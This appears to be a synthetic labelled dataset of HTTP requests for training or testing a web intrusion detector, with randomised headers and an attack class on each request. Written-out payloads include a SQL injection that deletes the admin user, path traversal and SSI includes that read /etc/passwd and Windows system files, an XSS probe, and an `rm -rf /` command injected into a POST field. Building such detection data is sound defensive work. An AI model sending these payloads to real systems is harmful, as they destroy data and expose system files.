User-Agent: Mozilla/1.4 (compatible; MSIE 2.4; Solaris; oKyAo; omsCl)
UA-CPU: 68000
UA-Disp: 420,4746,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7374x0863
Via: 2.8 165.220.150.159, 4.4 www.nnkm1.jpeg
Transfer-Encoding: deflate
Upgrade: vet/2.3
Warning: 690 www.lipntex.shtml "aeisgIo7eETipoewea" 
X-Forwarded-For: 242.188.252.188
X-Serial-Number: 3908709
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35254
Start - Id: 42259
class: SqlInjection
GET /aeatIr58Cusbseamd/r_xagZ/eN5zke7rQ.aspx?sAI9h=bURK1Ch3UNv&dqtuisw=sandh&gmhlhnis=26798&7eQFi@eNAhXy=5ew5&auonClqsn=%7Csud%3A&9WPtTHTqnetcat=ry0j2cY&uWznDKP57r=nit%27+++%29%3B+DELETE+++++FROM++users++WHERE++upper%28username%29+%3D+++upper%28++%27admin&htrr73SN=ELA9&Gtssc16decwl=uuhfge1ehear8&srbu5azj=36&TnItmusacsem=74 HTTP/1.0
Host: 12.251.227.49
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 164.216.181.230
Cookie: intf=am.i_vv;aoinlyr4=55;brh=n\3~;tgi=540155;nslr=t20D.oF
Cookie2: $Version="528"
Date: Thu, 26 Jan 06 17:14:06 GMT
ETag: W/"3EUs5XR7C38VJfgd-18V"
Expect: 100-continue
From: cuyents@tqutcrxrn.be
If-Modified-Since: Tue, 08 Nov 05 22:29:51 UTC
If-Unmodified-Since: Tue, 29 Jun 04 11:26:12 GMT
If-Match: "hJY--ujt5vlPCU2RZ_"
If-None-Match: "7sQpvDzf-HF7pA5dBkn"
If-Range: *
Max-Forwards: 2
MIME-Version: 9.4
Pragma: ds=si4
Proxy-Authorization: NTLM aWd1eTNuZHNvSTdmd3VkeFJzcHFodHV0dHlmRGVsNm8=
Authorization: NTLM ZGxyY2F3cml0dmFkeHhpZzN2YWlpb3hkM2JvcmR0aW5hcnU=
Range: 041331-40746,8485-207,-9
Referer: http://Jdan.st/sr1lle.bin
TE: trailers
Trailer: Range
User-Agent: eBo@ZL http://www.eenrefs.it
UA-CPU: Sparc
UA-Disp: 8058,0040,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 4325x083
Via: FTP/2.9 www.e0td.html, yjae/3.0 www.oyr9.html, 7.3 www.3mzIu.htm
Transfer-Encoding: deflate
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 603 www.noaae9et.htm "gipssw9ncjfTy" "Thu, 20 Aug 09 20:05:59 GMT"
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42259
Start - Id: 37266
class: LdapInjection
GET /oyst13kMSG5WL@Sy4/XG-a/eSule/slPchi/dSB.gif?mr6eaYd=0url4cete1ts&iondooledtiroo=hrcpcs&pMpdetrsntfe5ms=9534089&dieayjt=qxmlncrp&pee=fs%7Eegfprekt&wXJhttplL=525041&riFot-=Lnxqi%29%28+++%7C+%28oa%3D*%29&noneia8sE5w=84944486&catD8ron=68400&tetnCrtocfmor=twF20aceOii HTTP/1.1
Host: 226.202.159.192
Connection: keep-alive
Accept: audio/*;q=0.3, application/x-tar
Accept-Encoding: *;q=0.9
Accept-Language: *
Client-ip: 99.144.142.168
Cookie: EiPpDoofyIstdinV=gftewwqqcetssiTrh;dln=60455169
Date: Thu, 30 Nov 06 16:54:53 CET
If-Range: *
Referer: http://ee45iau.com/sksteoE/rsBln/IUy5fit.php
User-Agent: 7riEeedi

null

End - Id: 37266
Start - Id: 45699
class: PathTransversal
GET /p9sYPnT_n./09wXi4/feeuopbhcoCftnalrp/9YRhDCaexeceand5OG7/mMcPdbHI/sFsu8X/aEete2lao6nruanqzI/S8/9Sfyr/tUq1xh6l5S.png?7Ym7@k@=rtshzehie3eita&1ptaisowas=c0dOrco&YZocMC8bfhs=r9Wz&NG324=nHil&lit38e=9971141393&tassuao=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&Ra=0n3etythe3eas&n3e6g=%3BtzwimvbscriptpTsoEa%5C1e HTTP/1.0
Host: 244.107.202.138
Connection: close
Accept: application/*, image/*
Accept-Charset: iso-8859-3, x-mac-ce
Accept-Encoding: gzip;q=0.9, compress
Accept-Language: *
Cache-Control: max-age=91368
Client-ip: 23.236.107.29
Cookie: esuos=1t1hen6rmd;DTvSTM-=uaws;scasen1on=7269679;d8aVaaaoz=fynxEDoDxWG;s5e2H1eehs=5 hghttp)t|h
Cookie2: $Version="305"
Date: Tue, 20 Jul 04 04:13:40 UTC
ETag: "uIDDvKIZiH.oR@ZIi6O"
Expect: 100-continue
From: da6hf2i@mcgdn.fr
If-Modified-Since: Sun, 11 Oct 09 08:19:28 CET
If-Unmodified-Since: Mon, 21 Aug 06 24:09:44 GMT
If-Match: "Vjymh1PdVhFOCbCvW"
If-None-Match: *
If-Range: *
Max-Forwards: 289
MIME-Version: 5.2
Pragma: rr1eti='eo'
Proxy-Authorization: Digest realm
Authorization: Digest username="2ihr3onS"
Range: -934,-807,-703421
Referer: /s7ijr/wrran.tar
TE: trailers,chunked
Trailer: Proxy-Authorization
User-Agent: eealpale8 (s8_vzA5; ibpiBBjB; jdhdlkQ)
UA-CPU: Sparc
UA-Disp: 8763,047,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6938x271
Via: 4.6 237.41.149.212:70355, FTP/3.7 www.idny.jpg:4
Transfer-Encoding: elaapo; yeeeRfe=ethao
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 288 223.210.181.104 "nzlia9itn3swklmex" "Fri, 29 Apr 05 08:27:02 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45699
Start - Id: 39811
class: SSI
GET /PkOEinnullfyFFDv/ya7NovE/S0hsnmnohEc3fri/onae3tnnwrlnssa/ohneeellEI/i6phpZr84GEpqY/d0io19iVQ.56/fmwNG0ON8p/939YN68F.exe?JD1P=gempbiierilx&0PgDn.CYKU=375674&hhaqnrkin8haw=n&wehioNLcic2tl=8&6bodyE2UODnlQform=52221404&toNhT8rlooAcug=ertc&hstfeeitqram=Hlptbi&oaea6bifGgpem4=uoperl%7E+%5Ded+igroup+byEeu&aNfsr=sR1dqop1iO&ge1dhii=%40tA&twpositionxp1z1=r8-a&vamhot=eP&eiibSoi=%3C%21--+++%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22+++++--%3E&odg3Gleh=887258486 HTTP/1.1
Host: 170.216.17.24
Connection: close
Accept: application/rtf
Accept-Charset: x-mac-turkish;q=0.5
Accept-Encoding: 
Accept-Language: icne-2eJoepas, sees-51omehc;q=0.6, ee-HeblmaE, r-4sqisnt;q=0.8
Cache-Control: no-cache
Client-ip: 120.141.87.80
Cookie: s1tt=oasdhyeucsyha
Cookie2: $Version="9"
Date: Sat, 27 Dec 08 20:26:20 CET
ETag: W/"HB4MgAj2e0M.0QXb"
Expect: 100-continue
From: cbnnjsi@dofak2rw.org
If-Modified-Since: Sun, 19 Apr 09 11:59:37 GMT
If-Unmodified-Since: Thu, 30 Mar 06 11:17:16 UTC
If-Match: "5S2a5xeq29wu6Auy"
If-None-Match: *
If-Range: Sun, 29 Apr 07 13:55:12 UTC
Max-Forwards: 23
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest username="eege"
Authorization: Digest username="oeue"
Range: 9717-347450,4-
Referer: http://nAleee.be/eayakse/1ehhsdaa.gif
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/6.9 (compatible; MSIE 8.1; Win 9x; etoafwptue)
UA-CPU: Sparc
UA-Disp: 052,114,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 468x7869
Via: HTTP/0.1 www.geSd1Cog.shtml, 8.3 2.70.101.155, 1.8 www.IP3tw.htm
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
Warning: 410 230.107.4.184 "ldn6oohitmEt6c" 
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 0280999804959
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39811
Start - Id: 41949
class: SqlInjection
GET /thPHvaTincludeJC7linkFinput9/9YwOFNvtKjJV5A/uSkR_BacUz4te0/Twmit.css?VPH4=750343911&desEtsEerGihx=eu90RLE00h&SniyTGear=749625&os0hve1nlwhs4=5sock_streamE1%3Bs%26ir%2Bgis&wsyu4edesPh=psih3c&cttpodRnrsnan=an%3B%3Aiframe3dlEhfe&Jozr.Ntqnode=iunioni0b0dt2%40vdA&tseb=ewtiy&1hsfr9ck=s4M-_H&3oea=0899&1pusb8Hjreu5jd=sXGe5r&schj=eis&Uu@4xQKl3p=15768575&s15o=ssitaii4%27++++%29%3B++DEL%2F**%2FETE++++FROM+users+++++WHERE+upper%28username%29+%3D+++upper%28+++%27admin HTTP/1.1
Host: www.S7lsro.cz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 152.104.66.182
Cookie: oeftrraa=e7aa2;aei=lsnL;afa5iraNdeulnf=jjw9husP;KWOZPservicesZ=pT0F73FvQo;etrtAefgetieZta=091065
Cookie2: $Version="26"
Date: Thu, 24 Feb 05 06:52:02 GMT
ETag: W/"Xi2V.p7HT8fGoDYJZ39"
Expect: aeeedy
From: 7n10udti@ds4gh.org
If-Modified-Since: Fri, 17 Apr 09 02:17:04 GMT
If-Unmodified-Since: Sun, 03 Jan 10 23:00:03 CET
If-Match: *
If-None-Match: "5ZlG8oNFpAZ5Ob3hF"
If-Range: Sat, 02 Jul 05 12:03:07 UTC
Max-Forwards: 4
MIME-Version: 6.3
Pragma: taunjemm='O'
Proxy-Authorization: Basic MW5lYW1OdG46YXN0bHRlbnI=
Authorization: ltg0u zeLs=HjccvX
Range: 55660-
Referer: http://www.1rccb.cz/0gwus/yEfEg.mpg
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: ioUMWeWr http://www.lEfR.it
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1383x317
Via: HTTP/1.5 www.hnd0o.html, FTP/2.4 88.227.154.124:765
Transfer-Encoding: oaio4
Upgrade: imn/2.9
Warning: 021 www.mcyot.gif "hrtenvrrnpri" 
X-Forwarded-For: 79.193.225.128
X-Serial-Number: 41242078999326437
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41949
Start - Id: 40530
class: SSI
GET /iJx/kiRFlSLZY6-Rh/_RWy/eVq4DM_/rmOnitthl4aafqwa/s0ine5qheH.sh?2eoserbpi=ay&iFrKTj-S7=tc&teel5hneoEnbhw=214&uK@XrmwsystemphphttpF78=%3Etesh3EwaWfoLmG&vlbxDAist=%3C%21--+++%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E HTTP/1.1
Host: www.xamin.st:5
Connection: eafg
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: aet-ri4a6;q=0.0, rx-fq;q=0.9
Cache-Control: srpdti='d7xEx'
Client-ip: 233.63.57.74
Cookie: pt7-.78nservicesA=udqueakezEo9saem;eEeAhhmstnetlnT=bq6;ai2tsri=weZs;oe4hidTw=ehttpsktk;6ofu=nt~
Cookie2: $Version="59"
Date: Sat, 03 May 08 06:02:04 GMT
ETag: "jR2HfL@EpDJOH8a"
Expect: e7eTihs
From: phta9t@exney5i.com
If-Modified-Since: Sun, 29 Apr 07 08:10:30 GMT
If-Unmodified-Since: Sun, 20 Nov 05 09:41:55 GMT
If-Match: ".F048NzyNjE88MVs"
If-None-Match: *
If-Range: Sat, 04 Aug 07 16:56:00 GMT
Max-Forwards: 7
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM OXJ3bGd1ZWFnZWVTbnRzMHhpT3dlYmI2bzZweXR0TGY=
Authorization: Basic ZGNhdG50bzpzQW9lZXJ5bw==
Range: -52,238-2637
Referer: /nhyaPw/dale8n.php3
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: zP09dN http://www.hnot.ch
UA-CPU: MIPS
UA-Disp: 5153,3619,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1239x334
Via: FTP/3.2 www.entebte9.jpg:779
Transfer-Encoding: deflate
Upgrade: 26c/9.8
Warning: 706 www.8omhtse.shtml "seeiifggsn7jjfoai" "Fri, 07 Dec 07 06:30:57 GMT"
X-Forwarded-For: 93.190.193.214
X-Serial-Number: 61054598804485092045
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40530
Start - Id: 45895
class: PathTransversal
GET /aD/hhmda7tsM0ygiEe.dll?tsoteu8n=58200&fateesIzti=249&bOnnjM3=prfg1fea+3&TULFkNq-WRAall=..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini HTTP/1.0
Host: 33.220.79.144
Connection: keep-alive
Accept: image/jpeg;q=0.5
Accept-Charset: iso-2022-kr;q=0.8, x-mac-arabic, x-mac-roman, windows-1250;q=0.4, windows-1255;q=0.3
Accept-Encoding: compress;q=0.9
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 191.79.240.211
Cookie: 7aItitahs=tCeLecnx2wiieiymEc;7otrtestusdn=4>t;dslgnlAyxsvy=67
Cookie2: $Version="33"
Date: Sat, 20 Jun 09 15:55:10 UTC
ETag: W/"HxqwZITyDf0T7olEZiF"
Expect: 100-continue
From: NkanyTe@uhoerre.gov
If-Modified-Since: Wed, 04 Feb 09 12:20:28 UTC
If-Unmodified-Since: Thu, 18 Jun 09 17:18:34 CET
If-Match: "DChR2DoxsG6crIf5jM"
If-None-Match: *
If-Range: Tue, 03 May 05 23:11:10 CET
Max-Forwards: 24
MIME-Version: 5.1
Pragma: vfOyrte='alwkded'
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Digest uri=http://rwr7.cz/p4hn/tem4/aybte3e/orupse.dll
Range: 58-182597,4-9
Referer: http://www.F04oqi.be/anehM/nietdn/islo3Stt/o1k1toYt.msf
TE: trailers
Trailer: TE
User-Agent: Mozilla/8.8 (X11; U; Open BSD i586 0.9; dt-or; rv:6.4.5) Gecko/16523886
UA-CPU: StrongARM
UA-Disp: 567,3273,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1031x814
Via: FTP/2.7 152.151.228.201, FTP/4.1 www.5n5vYh.js:85
Transfer-Encoding: compress
Upgrade: iedr/6.7, enx/4.7
Warning: 813 www.vtuj27.png "rsxiUrrhinfa" "Sun, 10 Aug 08 15:25:17 UTC"
X-Forwarded-For: 121.121.166.30
X-Serial-Number: 447963296121692
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45895
Start - Id: 46217
class: PathTransversal
GET /laheirlsch7AheecftJ/s6gNytokaGlritndelgu/RhWYoptA/nfI6.MHN0Rw/debcoYaH-gs6etS/u0a77wKC3qh/Md4/passthruQ/Ihket0azeloaEe6oc6h.asp?onqu6ytwv=024218&3OINua=y%24&xcAJm-lsYt=twipsi-9y%3CGinE%3B%5Du&jjl=h%27++%3F&nRobr=rE.QYupE&rqtsd=ot3txo&Pd0ogaesbd=strrnkhzsahedshso&Nhereyg=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&ab=eoo0tes0r HTTP/1.1
Host: 180.66.28.245:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254, windows-1254;q=0.7
Accept-Encoding: 
Accept-Language: otedE-sn;q=0.2
Cache-Control: no-cache
Client-ip: 244.185.69.193
Cookie: xbxW@htaccesrcpN=713213;UrIm=cpe1nSoe8 ;vnEZk=594647459
Cookie2: $Version="6"
Date: Tue, 04 Apr 06 05:01:33 UTC
ETag: W/"DUY-qLgKZ1Fe0xBpfv"
Expect: 100-continue
From: xeibsrh@cIoaz0o30a.fr
If-Modified-Since: Fri, 06 Mar 09 22:45:35 CET
If-Unmodified-Since: Wed, 05 Mar 08 22:16:58 GMT
If-Match: "ji2IcZ_4V6jG5Rw5QiI5"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 5.5
Pragma: bt='lptreitl'
Proxy-Authorization: nuit ePlSnli=Ews6alar
Authorization: Basic aDBlczptaWU5aQ==
Range: 63-8582,2-821656
Referer: /Odibnsdv/ttshltr6/snTof3/rmhk/eahiauth.jsp
TE: gzip
Trailer: Accept-Encoding
User-Agent: uKnhpi (f8xFOo; bQ5CI.SsL@)
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6581x3968
Via: FTP/0.3 115.106.41.188, 3.6 149.83.176.182:3376
Transfer-Encoding: aLnyd
Upgrade: esjpot/5.8, eni/8.5, tytox8/4.9
Warning: 048 www.olNtt.tiff "8Oh4bg22euilahgn" 
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46217
Start - Id: 47080
class: XSS
GET /p3RzST0/abetweenIlike.tmpJZxservicesV/othnalbeNmHe/lahQqnNA9svzjEBFSX/1A-jp/r8tp7N5FmW8@.gif?axdyLydql=358&rpmEr5yhnsi26=t&onhhlnt=945535&sl2gAo=mfefbrEmeshn&stodHbzr7s=%26%7B%5Balert%28%27AtiAsatHvt%27%29%3B%5D%7D%3B&Utonahul=008&rnetzss6tetcw0e=tFYH- HTTP/1.0
Host: www.teeg.cz
Connection: keep-alive
Accept: application/zip;q=0.5, image/*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.7
Accept-Language: rg-vbeN1ana;q=0.0, et-Euotg;q=0.2
Cache-Control: no-transform
Client-ip: 25.88.59.6
Cookie: ightNeedzele=k;ntteh2n=794;OEQlQM=n8pelShoreersaeRs;est=h ;4JO2=tQaMot-zsENP;qWa6wwbtlaa=148071
Cookie2: $Version="70"
Date: Tue, 06 Feb 07 01:02:27 GMT
ETag: W/"_GoF4kFerEKe6x3Rh2-J"
Expect: 100-continue
From: danndie@tun81utu.cz
If-Modified-Since: Fri, 09 Jul 04 09:58:51 GMT
If-Unmodified-Since: Sat, 30 Oct 04 02:04:04 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 28 Jun 05 06:51:45 CET
Max-Forwards: 7
MIME-Version: 6.8
Pragma: esannB=eoOt9ke
Proxy-Authorization: sevi uteRs=ionsesm
Authorization: Digest qop=auth
Range: -43977,521-,5-
Referer: http://www.atea.org/ee1nsT/nAnsLtno/6ow5/toaslm.tiff
TE: trailers
Trailer: Warning
User-Agent: aSge/3.6.1.5
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 071x3560
Via: ee3jn/1.2 13.19.213.79:8110
Transfer-Encoding: identity
Upgrade: keTun/5.2, keYr/6.3, ierin/2.2, rla/1.3
Warning: 699 www.gnimlw.jpeg "bgtHtysIo0h" "Wed, 01 Aug 07 11:24:11 UTC"
X-Forwarded-For: 69.181.229.169
X-Serial-Number: 60697232
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47080
Start - Id: 46175
class: PathTransversal
GET /h1k_w@QIjccJ68DdwI0a/qglujmLEUWp6Y22/e9/35W8/S5nfjr6trbsneihz/eysd0sttahEe/mg5-cx99Ab6cT1sSqw/whiaaeso/2Finsert@5SvNzbinixl/iHHfrSv.3umUlETrn_Rn.tiff?qr.0wp-=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&Ythveojdfbat=hiotchs&f6V33=2&rmyy=8r HTTP/1.1
Host: 190.101.114.254:80
Connection: sylb
Accept: application/*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: compress
Accept-Language: *
Cache-Control: max-stale=554
Client-ip: 200.242.126.46
Cookie: ndwHNcG=bnhnis(hruuyiform;WpTEimgI=2tlcCe0Elrt
Cookie2: $Version="18"
Date: Wed, 13 Oct 04 12:47:13 GMT
ETag: "hgS4mgI8rGzEY4sN"
Expect: wpscl=eLmpno
From: e6aS@otptT.st
If-Modified-Since: Thu, 09 Feb 06 21:28:50 GMT
If-Unmodified-Since: Sun, 11 Oct 09 16:11:07 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 26 Jan 05 19:39:18 UTC
Max-Forwards: 1303
MIME-Version: 6.1
Pragma: jh1=jkrmell
Proxy-Authorization: NTLM cmVoc1RydHcwRnRyeTlsYWV0dHRUaHpveWtvcmlzZWFvaW55dQ==
Authorization: NTLM d2xwcmVzdGhzbHQ1ZTFPOWlyc3VuaGRuTGxlaGF0dnQyc3RpQWVoeQ==
Range: -62,23826-
Referer: /0ipit/Dn0so.pdf
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.1 (compatible; Konqueror/0.0; Linux i586; F2sueneere; xama1)
UA-CPU: x86
UA-Disp: 3301,4753,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 939x7286
Via: FTP/0.7 www.tNidsu5.shtml:604
Transfer-Encoding: gzip
Upgrade: amiap/9.1
Warning: 166 www.h5o9jhyj.js "urmjoohicentee" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 143207616945
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46175
Start - Id: 44779
class: PathTransversal
GET /sU6H7E6.W.cgi?Oci=file%3A%2F%2F%2Fo%3A%2Fluec%2F7zo%2FaalntR.xml&ieunuthhn=Vcnor%5DAbgsound%26o+eko++ HTTP/1.0
Host: www.cteihg3dwJ.org
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 7-eonHtea4, scnihw-yraheveb
Cache-Control: no-cache
Client-ip: 7.176.110.139
Cookie: nmc==E7;ntid2zdn7ds=nqienw2fPetd7abhw;lnltpenhW1rho=ehihehncld
Cookie2: $Version="8"
Date: Wed, 24 Jun 09 04:26:52 UTC
ETag: "P7JK-nkZJbb@PMNJ78a"
Expect: 100-continue
From: iddCt@3ahi.gov
If-Modified-Since: Wed, 27 Dec 06 21:57:59 CET
If-Unmodified-Since: Sat, 09 Apr 05 10:30:57 GMT
If-Match: *
If-None-Match: "kpwvyelLFc1LH0kyPV"
If-Range: "kkjXyaYb9_QMuAyd@wAE"
Max-Forwards: 5
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM TkFybzU4RWZiZXJwczBoZXJnc2Z0ZXdibDV5eDhydGJkbGlzcHM=
Range: 6578-336232,-258470,45228-5909
Referer: /nDcg/iyttiien.mpeg
TE: trailers,deflate
Trailer: Warning
User-Agent: Mozilla/5.1 (X11; U; Solaris 9.1; oc-ne; rv:4.0.9) Gecko/67957652
UA-CPU: MIPS
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 822x152
Via: tles/3.0 www.m5eaao.tiff:5
Transfer-Encoding: compress
Upgrade: xdn/6.9, zath/4.3, enftae/3.8, tsot/2.4
Warning: 651 www.ohli.jpeg "ze4iSksESreE" 
X-Forwarded-For: 39.131.202.145
X-Serial-Number: 2157159271334
----: -----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 44779
Start - Id: 43036
class: OsCommanding
POST /r5/ats8itauhtOnazn/tcMjX@/tosLas1leanmhoninro.swf? HTTP/1.1
Content-Length: 185
Content-Language: ip
Content-Encoding: compress
Content-Location: /tehe/twcrrgrt/EeT8/l0ie1.exe
Content-MD5: bjJ0bDFlaGllZ3NpU2FleQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 03 Jun 06 15:02:09 GMT
Last-Modified: Mon, 16 May 05 03:55:47 UTC
Host: 190.178.254.138:80
Connection: 1TfaaLp
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: identity, identity, deflate, compress
Accept-Language: *
Cache-Control: no-store
Client-ip: 31.142.70.36
Cookie: fhnzmldmaen9lfo=68;ai4aeha=eNaTifOUG;tFpr3s=bqapU\aaiWnhLid;Nhvo7nrnnhnt=k7.a5fj4sh4a
Cookie2: $Version="6"
Date: Sun, 23 Oct 05 07:08:35 CET
ETag: "AlUxBRc1lFh7_IbRVoc"
Expect: 100-continue
From: VsNdtdt@rdorILi.de
If-Modified-Since: Tue, 04 Aug 09 12:58:22 CET
If-Unmodified-Since: Tue, 16 May 06 03:27:07 CET
If-Match: "2kQ@kSxpFdV4@fPXi1x"
If-None-Match: *
If-Range: Thu, 29 Mar 07 08:50:19 UTC
Max-Forwards: 3
Pragma: 3=cfce
Proxy-Authorization: Digest opaque="ais18i"
Authorization: NTLM aTRhbmVybHRzcXJlZVR0M3RzZTA2ZGVPZXpkZmlhdGU=
Range: -98633,070828-,-9277
Referer: http://www.Eed9mbls.it/hknsaov/Oefds/eefz8pe/vgnr0t/tmcttj.shtml
TE: gzip;q=0.5,deflate
Trailer: Connection
User-Agent: 2ndhsnraic2
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: 3.5 www.ClIeoir.js, 4.5 19.57.102.35:4089
Transfer-Encoding: gzip
Upgrade: 6CozN/5.3, aqmg/9.3, yryyou/0.4, eket/6.8, aiea/8.2
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 225.126.234.64
X-Serial-Number: 4857297063808
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

yo2wexnoevba=   &&Wsersm&i3rgrpir=aa&njierefnE6Rknik=1700&aIeTnn=jteltesw2S&teobu0ddes=a+h7iinputr9eei9z/&omey0s8dx=yBPY8r&liHueaaNoeieqg=emjantFc&rre6is=`rm  -rf   /    `

End - Id: 43036
Start - Id: 49735
class: XPathInjection
GET /pb/aAPcwISy6O5QV7a9S/bgzZRXlfLFVO/t_Saq0Rpi.php3?ltpoAiQe=oAa1iltr7atbn&yt=r&sdwop9r7nti=w&ceie=1115245591&vhoi=telcgaidgl&euien=43&eEsogien6wsp4=%28i++%3C+++count%28bmpym%2Fchild%3A%3Atext%28%29%29++++and+++j++%3C++++count%28lo6r2%2Fchild%3A%3Acomment%28%29%29+and+k+++++%3C++count%28tanoij%2Fchild%3A%3A*%29+++++%29&samtBsFm_Y=vvr&ismAa3Eyd11=6124 HTTP/1.0
Host: 177.213.199.195:80
Connection: Ru30nnei
Accept: application/rtf;q=0.3, application/zip
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 24.134.122.55
Cookie: oS8HfYyG9sock_streamt=sctmpwoorai@ xseslf7;grTyN=rhstsrAtmptnhpslaupdate0a;ertcieestoetea=ufromsstixhse;Tns8xf3aq0o94o=807
Cookie2: $Version="05"
Date: Thu, 19 Feb 04 19:22:33 CET
ETag: "-Dc1ZeBRZlf3FwUe"
Expect: 100-continue
From: ejeriHt@tvteeteb.fr
If-Modified-Since: Sun, 14 Mar 10 06:15:11 UTC
If-Unmodified-Since: Sun, 02 Sep 07 08:45:12 CET
If-Match: "dQEuefFbIxp4tn.NinJ"
If-None-Match: "A5d0@9cR@oiQehAe"
If-Range: *
Max-Forwards: 1
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Basic aXd5RWRhbmE6OHFuOGVuNGU=
Authorization: Basic aXRhc2xmMm46NGJhMw==
Range: -37003,-5,-1
Referer: http://www.w9uYh.uk/oheb.jsp
TE: trailers,gzip;q=0.9
Trailer: Connection
User-Agent: onelba (oJa_b3)
UA-CPU: x86
UA-Disp: 3953,5444,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 4653x522
Via: HTTP/3.6 49.91.146.155:963, 6.0 www.ehests.gif:6340, eaivOL/4.1 www.htsmuy.js
Transfer-Encoding: deflate
Upgrade: Nxie/2.9, waree/1.4, eaTli/1.5
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49735
Start - Id: 38110
class: LdapInjection
GET /e7uv13aqoop/ynF/6gsrotn6/orh/rdeshes/8U0Z/h1AbovrWGn98sP/uMLmvWo2OvYyS0/rvelZGEf1L.nsf?5Kand-k.R=32&ig4eEoE=9ei&oN=+Uehe&HO83nph-hYd=fa%29%28%26%28objectClass++%3Daru*%29&na2ueri=+%7Enei&hpcneesRjilo=99463 HTTP/1.0
Host: www.bere.fr
Connection: igsael7t
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.2, identity, identity;q=0.9
Accept-Language: *
Cache-Control: no-store
